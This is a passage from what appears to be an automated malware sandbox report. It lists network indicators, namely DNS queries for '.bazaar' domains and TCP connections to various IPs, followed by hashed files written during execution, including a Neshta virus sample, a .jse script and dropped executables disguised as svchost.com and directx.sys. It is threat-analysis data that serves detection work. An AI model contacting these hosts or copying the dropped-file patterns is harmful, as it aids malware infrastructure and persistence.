| CA | 142.4.204.111:53 | `achikzbehiq.bazaar | udp |
| CA | 142.4.205.47:53 | `achikzbehiq.bazaar | udp |
| CA | 158.69.239.167:53 | `achikzbehiq.bazaar | udp |
| CA | 104.37.195.178:53 | `achikzbehiq.bazaar | udp |
| CA | 192.99.85.244:53 | `achikzbehiq.bazaar | udp |
| CA | 158.69.160.164:53 | `achikzbehiq.bazaar | udp |
| CH | 46.28.207.199:53 | `achikzbehiq.bazaar | udp |
| CH | 31.171.251.118:53 | `achikzbehiq.bazaar | udp |
| CZ | 81.2.241.148:53 | `achikzbehiq.bazaar | udp |
| FR | 51.254.25.115:53 | `achikzbehiq.bazaar | udp |
| RU | 176.96.238.128:443 | tcp | |
| DE | 82.141.39.32:53 | `achikzbehiq.bazaar | udp |
| DE | 50.3.82.215:53 | `achikzbehiq.bazaar | udp |
| DE | 46.101.70.183:53 | `achikzbehiq.bazaar | udp |
| DE | 5.45.97.127:53 | `achikzbehiq.bazaar | udp |
| DE | 130.255.78.223:53 | `achikzbehiq.bazaar | udp |
| HK | 45.207.100.147:80 | www.szbiqiangli.com | tcp |
| DE | 144.76.133.38:53 | `achikzbehiq.bazaar | udp |
| DE | 139.59.208.246:53 | `achikzbehiq.bazaar | udp |
| DE | 172.104.136.243:53 | `achikzbehiq.bazaar | udp |
| EC | 45.71.112.70:53 | `achikzbehiq.bazaar | udp |
| US | 50.28.51.143:8080 | tcp | |
| FR | 163.172.185.51:53 | `achikzbehiq.bazaar | udp |
| FR | 87.98.175.85:53 | `achikzbehiq.bazaar | udp |
| FR | 5.135.183.146:53 | `achikzbehiq.bazaar | udp |
| FR | 51.255.48.78:53 | `achikzbehiq.bazaar | udp |
| FR | 188.165.200.156:53 | `achikzbehiq.bazaar | udp |
| FR | 147.135.185.78:53 | `achikzbehiq.bazaar | udp |
| FR | 92.222.97.145:53 | `achikzbehiq.bazaar | udp |
| FR | 51.255.211.146:53 | `achikzbehiq.bazaar | udp |
| US | 144.202.48.107:443 | tcp | |
| GB | 159.89.249.249:53 | `achikzbehiq.bazaar | udp |
| FR | 62.138.26.28:8080 | tcp | |
| GB | 104.238.186.189:53 | `achikzbehiq.bazaar | udp |
| IN | 139.59.23.241:53 | `achikzbehiq.bazaar | udp |
| IT | 193.183.98.66:53 | `achikzbehiq.bazaar | udp |
| UA | 77.52.245.101:8008 | tcp | |
| IT | 94.177.171.127:53 | `achikzbehiq.bazaar | udp |
| JP | 45.63.124.65:53 | `achikzbehiq.bazaar | udp |
| LT | 212.24.98.54:53 | `achikzbehiq.bazaar | udp |
| MD | 178.17.170.179:53 | `achikzbehiq.bazaar | udp |
| NL | 185.208.208.141:53 | `achikzbehiq.bazaar | udp |
| NL | 82.196.9.45:53 | `achikzbehiq.bazaar | udp |
| NL | 146.185.176.36:53 | `achikzbehiq.bazaar | udp |
| SE | 89.35.39.64:53 | `achikzbehiq.bazaar | udp |
| RO | 89.18.27.167:53 | `achikzbehiq.bazaar | udp |
| RU | 77.73.68.161:53 | `achikzbehiq.bazaar | udp |
| RU | 91.217.137.37:53 | `achikzbehiq.bazaar | udp |
| RU | 185.117.154.144:53 | `achikzbehiq.bazaar | udp |
| SE | 176.126.70.119:53 | `achikzbehiq.bazaar | udp |
| SG | 139.99.96.146:53 | `achikzbehiq.bazaar | udp |
| US | 144.202.48.107:443 | tcp | |
| UA | 217.12.210.54:53 | `achikzbehiq.bazaar | udp |
| GB | 185.164.136.225:53 | `achikzbehiq.bazaar | udp |
| US | 192.52.166.110:53 | `achikzbehiq.bazaar | udp |
| US | 63.231.92.27:53 | `achikzbehiq.bazaar | udp |
| CA | 66.70.211.246:53 | `achikzbehiq.bazaar | udp |
| US | 96.47.228.108:53 | `achikzbehiq.bazaar | udp |
| LT | 94.176.234.118:443 | tcp | |
| US | 45.32.160.206:53 | `achikzbehiq.bazaar | udp |
| US | 128.52.130.209:53 | `achikzbehiq.bazaar | udp |
| US | 35.196.105.24:53 | `achikzbehiq.bazaar | udp |
| US | 172.98.193.42:53 | `achikzbehiq.bazaar | udp |
| US | 162.248.241.94:53 | `achikzbehiq.bazaar | udp |
| US | 107.172.42.186:53 | `achikzbehiq.bazaar | udp |
| US | 167.99.153.82:53 | `achikzbehiq.bazaar | udp |
| US | 138.197.25.214:53 | `achikzbehiq.bazaar | udp |
| US | 69.164.196.21:53 | `achikzbehiq.bazaar | udp |
| FR | 51.254.25.115:53 | acdhiladfhir.bazaar | udp |
| IT | 193.183.98.66:53 | acdhiladfhir.bazaar | udp |
| RU | 91.217.137.37:53 | acdhiladfhir.bazaar | udp |
| FR | 87.98.175.85:53 | acdhiladfhir.bazaar | udp |
| AT | 185.121.177.177:53 | acdhiladfhir.bazaar | udp |
| ZA | 169.239.202.202:53 | acdhiladfhir.bazaar | udp |
| US | 198.251.90.143:53 | acdhiladfhir.bazaar | udp |
| AT | 5.132.191.104:53 | acdhiladfhir.bazaar | udp |
| AU | 111.67.20.8:53 | acdhiladfhir.bazaar | udp |
| AU | 111.67.12.221:8080 | tcp | |
| AU | 163.53.248.170:53 | acdhiladfhir.bazaar | udp |
| CA | 142.4.204.111:53 | acdhiladfhir.bazaar | udp |
| CA | 142.4.205.47:53 | acdhiladfhir.bazaar | udp |
| CA | 158.69.239.167:53 | acdhiladfhir.bazaar | udp |
| US | 144.202.48.107:443 | tcp | |
| CA | 104.37.195.178:53 | acdhiladfhir.bazaar | udp |
| CA | 192.99.85.244:53 | acdhiladfhir.bazaar | udp |
| CA | 158.69.160.164:53 | acdhiladfhir.bazaar | udp |
| CH | 46.28.207.199:53 | acdhiladfhir.bazaar | udp |
| CH | 31.171.251.118:53 | acdhiladfhir.bazaar | udp |
| CZ | 81.2.241.148:53 | acdhiladfhir.bazaar | udp |
| FR | 51.254.25.115:53 | acdhiladfhir.bazaar | udp |
Files
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\datareporting\glean\pending_pings\27648147-adbb-4d74-a5e2-23ddd665ec8a
| MD5 | ed2f6bf88ed0a899251ac9b4c96b9018 |
| SHA1 | f4336c27374196c85cc268585ae437ca79232c3f |
| SHA256 | 44b575621743b08a1be342e3041df2bbb8d5d83994483ede2bef7a80d7289fff |
| SHA512 | 24317cf6dd22320239a65867775b59631ceefb80f89031f529674d4ad2de8be40a89bca296941f81fdc2d79c3c851bd9e135d9574ffaf157446cd2245eeb502a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\datareporting\glean\pending_pings\bf1f157a-5f39-49cf-bce4-6d9ee6659a5a
| MD5 | 3aab6a2575dbb1eed1969834054271a4 |
| SHA1 | 0a7164b2ac58c2c69a4852526fccc587332240e6 |
| SHA256 | d87a835558a16e9036530717d8a8fe1cd9578e220e1ecd242d25e283b8af8cb3 |
| SHA512 | 07cafeccbec1bec1ecd5b977d9e6189d0170fa361c3167fd696f48eb653d2d3efd96b27c79b0c83061ffa1485bb26a962ff797ba001de0f406faff39c6202e64 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 6e9f257ac078a0ff65ed0c471f42e0de |
| SHA1 | 79561475b60f7cf7633bf7afc3ec4e3c472c66c7 |
| SHA256 | a3d2d3b04256e8676b71d38e92cd2781e8c8d7264475a13c85feac14344f7c08 |
| SHA512 | fd6f9f601cc75d58092598f1c35290a74e745aad57322f814098085a54d38fae8858397d155f7656e5a0a206ebbbcd787ba5c1d5634061c2cbb71f3b2f43267b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\AlternateServices.bin
| MD5 | fe8d8121cc9f9098a5416dc5188f3565 |
| SHA1 | bece501a916702c0f724037287f1eecc82da7292 |
| SHA256 | eeaed10a9fc66ff4b2f2a99dc0d4aea360709875e5f8a70a92babc9518e9e2b0 |
| SHA512 | c5a2abbf3e3da1f1173744b3b859cbcf27e8442108876ea17b1edadca822a8335ef07c4fe4fc006c9590e6ebb252d9ae7f64e84c442b2428dd37308cd00f7210 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 06ec6c0020150dfadd60bc8b4717c2e1 |
| SHA1 | 1fd6a57952f91bd62b43dada98f12370966379a3 |
| SHA256 | 62e48308dbf00a5da7f97842e32ec7a8fcdbbf1273bfbb08e89e0122782b6b05 |
| SHA512 | 24840af01c5fd8f1c804d8f56543361d02977a0299420c9782ae6f37a4de96d36a79b9d6be9d24059de9af5c6293c485f80f88e3f943ce3e4b18cdaf5239a974 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\datareporting\glean\pending_pings\0af248ac-8e8d-4aad-b89b-d9afa8973bfd
| MD5 | 8dd89824b560c19d80be69f394ddb412 |
| SHA1 | fa823570701da4b4afaaa436868cacc73fa5ebc6 |
| SHA256 | e7fb5295ef660c86a0bf368e0ebca9033d7c86e75a119eeb5c8d1c45dcbc07d4 |
| SHA512 | b36674894cca3aa3c909544cdf9846a6054ae3b9a1513df141ed0d4d65b010f95b4d98cd26abd6fb21d4e0845dbb5e38caa1eae3f3dc40441a8d3678367b4959 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\prefs.js
| MD5 | f3e86fbe3029fa01ea4a679307fed879 |
| SHA1 | 2ce9f59587a17387c4438becb82498b307c59e95 |
| SHA256 | 491e09e3c6225612849f823ce89a63b411a8050dfe05a3ec81cefaa1f2ad48ec |
| SHA512 | c409951ff23b5a13bf1cd44c6e9a5c0a15d20334f293a9915e2119dee2ebdd9fc443a29e01adbb4427dda8784fe5032cc1cef91fe1725001d1b661de3ed5c764 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\maevrvll.default-release\activity-stream.discovery_stream.json
| MD5 | 0f354b9d749c6774545181fd051b4f10 |
| SHA1 | 6056d18adb5292834ddec47ffaaee36dc8911c56 |
| SHA256 | 7a814fcc13d90f35ae0beaab73cc29ebd3f0ca65f89adc3b51e609f9c1b47e2e |
| SHA512 | 6bf02f20e3c5e694b5f2997abc38ad2746adfb7de9597f435f8548d607948e7ed3a6846e69092fcb4a0ca8afee4b2f32222ce342d5f5fc5ac150f0c531cd99c2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\prefs-1.js
| MD5 | 92169c8a8c1ee3121b9119cb2470be47 |
| SHA1 | 7013df5cb4e53a17f8058a21f987d9e4d75b87e6 |
| SHA256 | 80fa1f09f3e5a7cddba576b8b86d9a585b8df956ed1b884ac8dfc98d277983b6 |
| SHA512 | b50977e2ab5bfc13151e6afffbf0dbc6a1832a49f3c74108a0b56ed2f6d49173d7eca6b1d3290ccd39dcc1795077da0f5b6f39f6bd7d31af8b776efb3c015559 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 0078ae1064e6a56f69c16d810557d499 |
| SHA1 | 5cbad4beb81220aa01e4e1fe29f5c8909878117e |
| SHA256 | d0aa8ff878b5bec91fe22c00d521acacae32a24046090b70449ebcb72d890e05 |
| SHA512 | 0fa99276912efcb46810c20daf84c461a9b2ed7f9bc9b68cb43dc2ff32a3cbd883890a2638019f5aeb100430994171736c372314cad2402c673b8ca20848d21a |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\maevrvll.default-release\cache2\entries\39DB9E847E680B765D7B04FCCE6BF5BC0225F878
| MD5 | 7aa4e52b55aeb9019e6bc5db34cedbeb |
| SHA1 | 9a964d3fb5d6eb4762c23bda098a6645dd24bb9e |
| SHA256 | 25bcfaf087481debfe612eab753081abb3985ac4e91eb6f8b153bf1d1a9dd21a |
| SHA512 | ab02b54e9d0ca88d0ccceb7c4999b63543f03e005131afe602675c8ee80f6ae89832ef3b52951d5cf54c6e158276dd7748a559866e52704d08b7c04dafea762c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | 6bd92a5111ab47b671c2ef922406967a |
| SHA1 | 034bf17d97efd725504d9d91d8c5dcb4017e54a1 |
| SHA256 | 255561d3ac87df68e1c1a8fa369a2a797c53ea9048e1a6d7e5f4332f62728f39 |
| SHA512 | e74b9cd288d1a7bfc7967df7c93c0f9854f81e159b59d6d26638e3dff3b11666285516c90a98af22531ec80b323e10863a927c689bd9fa8dca9c6f18dd201efe |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
| MD5 | 2a461e9eb87fd1955cea740a3444ee7a |
| SHA1 | b10755914c713f5a4677494dbe8a686ed458c3c5 |
| SHA256 | 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc |
| SHA512 | 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
| MD5 | 842039753bf41fa5e11b3a1383061a87 |
| SHA1 | 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153 |
| SHA256 | d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c |
| SHA512 | d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\prefs-1.js
| MD5 | 8a3400ed2fa91df226717f92dd2904f0 |
| SHA1 | 0ca29fcc020412b6b0bdb97ea881c501f7bffc89 |
| SHA256 | eb79a6c0c7471d71c4fdcd247d603c2936f38fa5948fc39bd84f23f933b688ed |
| SHA512 | 36bd491cc160a97b0b66cfdebc63c0565b366ee89249654622e4a2ec4d1e372d97a6c73b68f4eb79182913dedbfe44e868a980bacc89aa9f79c4ac4aafabfd96 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\maevrvll.default-release\cache2\entries\0EA2E1AC3653A248EDE38E975FF2A4ADDA308244
| MD5 | 8cb8fc364623b70897ebfc279b906f5e |
| SHA1 | 4292e7a0f46ac20a0aa9dcfe1d29eb8572e379f5 |
| SHA256 | 772841310b710e27712476d4917857051056de5c442d45f662bb0ded97bf2b57 |
| SHA512 | 932794abebcf8881075902fc65bcf7a8050915c8dd02635c1b99ca3f25ee11847e50fe2a9f5b37b9cb3d9016f383bd5e9d245c1444f48f37ef53a6e79a65ee79 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | 80b0579db072f75a720df84d48bda1d8 |
| SHA1 | 821e3df4d9fbd38b16573fbe727c677852fc748c |
| SHA256 | 3acd6fde97c8acb8f14edddefc983c3c01fff6bfb0620c3279d45d2f91ab2b0a |
| SHA512 | 09df5cadf02f10c4cbf2cc039b6595d0e356593cb3b67e85c80f1063e0720647e2fabd9a789a29e55871efcd77d35fa17ce0cfaa2b50fc5db053e727b48af363 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | 677f1678c7db53bab1870377af681004 |
| SHA1 | 8129576835145698ce89b4801fb88ce03fc3a174 |
| SHA256 | fed23256f817fd4ce07c85fd33223f89290d9de38b9a2de828b18898a7a2a44a |
| SHA512 | 2236cd5342833190341ce100ad028fd063f7a9db5386c439ac2290ea35bbaf4193cb7c76df86ca1c7f99f5589d8bc0301d49230136c5799a3235d77ebec8a76a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\AlternateServices.bin
| MD5 | e563b339495d4c3929266f9bddf84f83 |
| SHA1 | 9354bb9ad530375b3a2cf5908748955b151a81fd |
| SHA256 | ff8eca952750b1ddf8c09dcc7af9432f44f2e76563d78df208497f5e72a9d05a |
| SHA512 | 5e3006c4eecb54c4939f10144adf9ce14a2289fb096a72b8efb6d9e8f565a149b451f0cb896883ea9c7f9a96d8bc2929f5733000e1f2bdcf2344760c74485b86 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | 1acc46c0a4ac0ce45084ad90485a36bc |
| SHA1 | 5473f2774ee3804ffe79b5f295d8b6b24d3f3228 |
| SHA256 | 6dfe549446fca5bb2054675d3cce280d97ff66526bdbb382df187f313a3460ef |
| SHA512 | 54204e0baaa8cc0083dd7765dc272855a9a6f38f5ee7ee944f0adcbb33b7014e9bd81fa73b5a52bf8bcf41eaa599063d1c83681412e2d0e04014e4a4ea53aa04 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-2
| MD5 | 0a8747a2ac9ac08ae9508f36c6d75692 |
| SHA1 | b287a96fd6cc12433adb42193dfe06111c38eaf0 |
| SHA256 | 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03 |
| SHA512 | 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
| MD5 | bf957ad58b55f64219ab3f793e374316 |
| SHA1 | a11adc9d7f2c28e04d9b35e23b7616d0527118a1 |
| SHA256 | bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda |
| SHA512 | 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
| MD5 | daf7ef3acccab478aaa7d6dc1c60f865 |
| SHA1 | f8246162b97ce4a945feced27b6ea114366ff2ad |
| SHA256 | bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e |
| SHA512 | 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\gmp-widevinecdm\4.10.2710.0\LICENSE.txt.tmp
| MD5 | 49ddb419d96dceb9069018535fb2e2fc |
| SHA1 | 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6 |
| SHA256 | 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539 |
| SHA512 | 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 35b3e8ca780867dc05407ff5e6920146 |
| SHA1 | 917117746066c5bc732d5ca549ab65e32dc788dd |
| SHA256 | 8ce5010ffb2f1a73bd9d70eebf02b58d6ef4cd2825cc616d25358568f1bcacea |
| SHA512 | 01c725d419e2e5e03a0c5d780059dbcc57a44298e86e1eca3afa23cfe4c39cc9a6b7cbe010492fcdb1d95ac3a270ec7d68e86ff5fc6a003777d639b921ca67cf |
\??\pipe\crashpad_3012_BMDVBZNZOFYOWULF
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Temp\7zO4E8D6D39\waiting.jse
| MD5 | 40e8c77f38d2be287e12ade334a2b831 |
| SHA1 | f534c5072f63acd888e1dc0e287f973387cdd320 |
| SHA256 | ee1484721f7727d6f402cffa4e7dd5bed09ee7b2a17b769b4f551c47857c9f50 |
| SHA512 | 4b921c215f304e65b591ee0673a42726c9ba04d881c62ee8f4f8746289f0dfd2ca171e04be0523c3715a72f6f1232b7a022b3ed264b867c708003640d2225fc7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 167e383e911f526b2c0c2f5280d4ea59 |
| SHA1 | c46e0c6e8801a34ea5943546483fd15b409b2663 |
| SHA256 | 40578450382cc74f3272f54ce4c07df911c34eb72efb7ffb88ec9e8cb33248e5 |
| SHA512 | 0639ff2cf3100be98a7b67fd9f656ddee31fe1aa197d457ded3a2b5c4c70207303312897a01a2c084f8f96beb986110c92b9eb66b20de6d6c33a44cfe5f40bd0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 89dd74019154e00104c6e7f8565c0cb8 |
| SHA1 | 01d2e2e6e19a7e24395fccedc58b1be6486ca192 |
| SHA256 | 2b04f912dc04a16ccaef68d2f8287d4432b107883c03d11a1890d6a5cbffd3ef |
| SHA512 | 7515730366d8790c523f1c947a105fcb6281e6d0a9387a95ff54556157e4c6d0d0e42fba28fa5089198e10aaaf2693ae184b8e1e794e45ca0f35bc11e6d026f5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | d22dfff66b8d6e06afa6708f9e34a6cb |
| SHA1 | e2589d5ccf04895b1773e82f5c8c1d14d1b8eb93 |
| SHA256 | caa7a4947b34ea7a2e4274f7f45901dee415c1e80dde69aa1b9ca4bf270bbb44 |
| SHA512 | 8323f5aee7fefa9e202bbebece99373d5b299b5343e7cb20c5f802011b71fa03bf09e7da63b9530e8a8f783f6b12607829e64f55f20f7077eb45b9c25d1ac52a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | f07ae76f1b540af29bcb636bf54db685 |
| SHA1 | e5b49259866e9537b083374aa3a21800a8477b54 |
| SHA256 | 43dd97e47c7f0e66dbf9205dbce0a231febeb1b1dd9bf8a9f6952ba0ad9a75fc |
| SHA512 | d3a892b2c5164779b259cadab2313235011e924639c26e3055b927145318ca59da2eaa059564aa3f061ea044496167c0f14eff8afdcbf777d1c91ffc6a1a1d37 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 0115525c3d42464b64b5ce6dbd7a7188 |
| SHA1 | 53aae4caef5dd117c3be8ddf78df87c9cd920825 |
| SHA256 | 11092c49d4696a2c4c4ba64b00cb525e70a2bec6cda84f1f44899b050ba8859f |
| SHA512 | 866abb8367f2543dc8f34698fe956150fe59aa8a8549bd92b0c60290e939d8fd91470d7b50d3f1d18f1bdd4dfaa6ff4ea48678c366d87f82c9e7e9116ccf7221 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 3af7687f6dcc65c07171311d53a01c29 |
| SHA1 | 1c47c9c47c49ac2438f1e4703d8afba2e61eb1ed |
| SHA256 | 8a25484e54c2419ee40c8c7e2cd68d9b541583aac68a362c8a9049f9500b8fb3 |
| SHA512 | 2f4bf9035fc0d9b6358f4e4be66dc49ef56bf1c362d88f3321327fb4712b2949a237d78b6219665eab1d5d6f927a3d60749ae8979e930cba17415de6ab332841 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 0f0a03251a450526dad2f7902e719c5c |
| SHA1 | 0626e72a7ec449f1f770dc36e77a512348dbae6c |
| SHA256 | 3d976d4a29224d61353c8ddb1faa2f8d98cb623529d2c75fae80018e84283c48 |
| SHA512 | 908f23cc6908ec1d0d4a51e20825c2881fa1a82fc435b175dbe95bd657b4531885be26c84347c01ed0c6269bc39067cbc3068ab4928a0ad46b6d1bb8f6efe8db |
C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe
| MD5 | d7d6889bfa96724f7b3f951bc06e8c02 |
| SHA1 | a897f6fb6fff70c71b224caea80846bcd264cf1e |
| SHA256 | 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e |
| SHA512 | 0aabb090791d8b7c5af273793d61bc7ef164343d027e12b58faec66dbdddb724f58b267a423088ce06c52420af80ffe276b448cd3844fee4f929a98b0f64ae75 |
C:\Users\Admin\AppData\Local\Temp\3582-490\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe
| MD5 | 5308aacaa532afd76767bb6dbece3d10 |
| SHA1 | 31588d24439c386740830ee4d32f9d389bcf6999 |
| SHA256 | b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb |
| SHA512 | 0aaaa0862d9b15b9ad423bde6f5edf95f1309924d0645305739004f072a3c2eba6cc66af1892a29af8b8c16424e89ab166b5f23860592f8d72726fe2883e45ee |
C:\Users\Public\Video\frame.exe
| MD5 | 2d411dc28a5faeb5893d7769b7c3b8a4 |
| SHA1 | 1db46d9a9e27146ca12dcc9caff51ede700cf026 |
| SHA256 | b218fb4573b6c8fff51870de463a793238a4f317ce9abdcf8352954f92328eac |
| SHA512 | 5aab004d78dc87528f8965426d446dde68f8c8ff4a34cfecf1b69ade65b625f15d34fccbf4629ff42e49410379bd447eaa4f2339f11483d950e174a7d5aa8804 |
C:\Windows\svchost.com
| MD5 | 251cd85b25cd5354b53adbd6582bddfc |
| SHA1 | aab6c36d68b60c2330a01e50e406a04e323865f7 |
| SHA256 | 090967348471cadab71a23d1b3ae1cad3992b7d32d9b3b04f13366bdab014e64 |
| SHA512 | e0a8007189b68867bf8051895a7f132076db5fefa6724e25731da7f856d0a060c9d71fcd4ccea626e34c55181ac5835053154c29da4fa33bba5b46b1bb336524 |
C:\Users\Public\Video\lphsi.exe
| MD5 | 0bafccfaec9c7d45ce491e4b0ddc1bdf |
| SHA1 | f0fa26da45d04ca36e9eb0acbc2d8ddce881e096 |
| SHA256 | 9da1a55b88bda3810ccd482051dc7e0088e8539ef8da5ddd29c583f593244e1c |
| SHA512 | c32b734420be1ee3a54dfea117f2fb14353fbd39831d8bbe8a4515c983f0781c38d4bcc8a6c5fd0785693fa3a16add499387bd8add21f706c9927d537e38184e |
C:\Windows\directx.sys
| MD5 | 1d2e39f7e0636ea983b5afa39b3eba9f |
| SHA1 | c550f91050bc096c33b3516ee0e9147c7fb987b8 |
| SHA256 | 43d81a94d6fe2cd7b2718d2f011a5b51df5797db5b1cedf83c7aa9e176490789 |
| SHA512 | a71ca82fa0feccb0933f8bdae8bccf74bc3237424c772493d3851696eab220cb7cf9f6eb84e4d79714c910aca4caa5af709c2ee34a7870708f567c5d0618a2eb |
C:\Users\Public\Video\hrss.exe
| MD5 | 747d4870a9e1504b1f802fce83704bb1 |
| SHA1 | cb5b1fb54a6f1081d985dc44462983e31778d9d5 |
| SHA256 | 3a04dd93ec9da19781ba97412b466452a9682a390f2cf4426f722e424465fb19 |
| SHA512 | 03adf5635828256581a4ec708c3734eebd11e603f9a4e3bd6a3149fcf525a85bf45ad4b880b0de37b9658794c88ad3cd6f9a4a43e4f6ad4bd01110d72a502a12 |
C:\Users\Public\Video\movie.mp4
| MD5 | 6db2f5ec1a147474049457da8a8b4e19 |
| SHA1 | 2c27ea1a99da4d75e56bb1db0ba4476ef024db90 |
| SHA256 | f2f673e454a9b91653b4c0dbaa12bafaef2151013dc78c9235339c4ca03c48e3 |
| SHA512 | fc8eb7937940c08551b120408ce4920de5aa4aee3f53aab7e16328d4572c1dc5397fbd8f1b5f185f32b0addf31a35272ec8bf390725b566427eff2f801eb27d8 |
C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE
| MD5 | 39c8a4c2c3984b64b701b85cb724533b |
| SHA1 | c911f4c4070dfe9a35d9adcb7de6e6fb1482ce00 |
| SHA256 | 888a1dd0033e5d758a4e731e3e55357de866e80d03b1b194375f714e1fd4351d |
| SHA512 | f42ca2962fe60cff1a13dea8b81ff0647b317c785ee4f5159c38487c34d33aecba8478757047d31ab2ee893fbdcb91a21655353456ba6a018fc71b2278db4db2 |
C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe
| MD5 | 322302633e36360a24252f6291cdfc91 |
| SHA1 | 238ed62353776c646957efefc0174c545c2afa3d |
| SHA256 | 31da9632f5d25806b77b617d48da52a14afc574bbe1653120f97705284ea566c |
